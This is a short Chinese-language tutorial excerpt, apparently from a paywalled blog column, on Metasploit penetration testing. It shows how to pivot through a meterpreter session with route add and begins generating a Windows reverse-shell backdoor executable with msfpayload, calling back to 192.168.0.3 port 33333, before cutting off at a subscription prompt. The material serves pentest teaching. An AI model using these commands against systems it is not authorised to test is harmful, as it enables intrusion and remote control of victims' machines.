目标利用与权限提升全解析
1. 深入目标网络的路由扩展
在渗透测试中,若想深入访问外部无法直接访问的目标网络,Metasploit 提供了强大的路由功能。可使用 route add targetSubnet targetSubnetMask SessionId 命令来查看和添加到目标网络的新路由。例如, route add 10.2.4.0 255.255.255.0 1 ,其中 SessionId 指向现有的 meterpreter 会话(网关), targetsubnet 是位于已攻陷目标之外的另一个网络地址。设置好路由后,Metasploit 会将所有流量通过已攻陷的主机会话进行转发,从而实现进一步渗透原本不可路由的网络,这种技术被称为“跳板”或“立足”。
2. 客户端利用之生成二进制后门
在远程利用目标的基础上,客户端利用也是重要的一环。使用 msfpayload 工具可生成独立的后门可执行文件,能立即提供选定的 Metasploit 有效负载服务。以下是生成反向 shell 有效负载可执行文件的步骤:
1. 执行 # msfpayload -h 查看使用说明和所有可用的框架有效负载。
2. 生成自定义二进制文件:
# msfpayload windows/shell_reverse_tcp LHOST=192.168.0.3 LPORT=33333 O
# msfpayload wi
超级会员免费看
订阅专栏 解锁全文
4374

被折叠的 条评论
为什么被折叠?



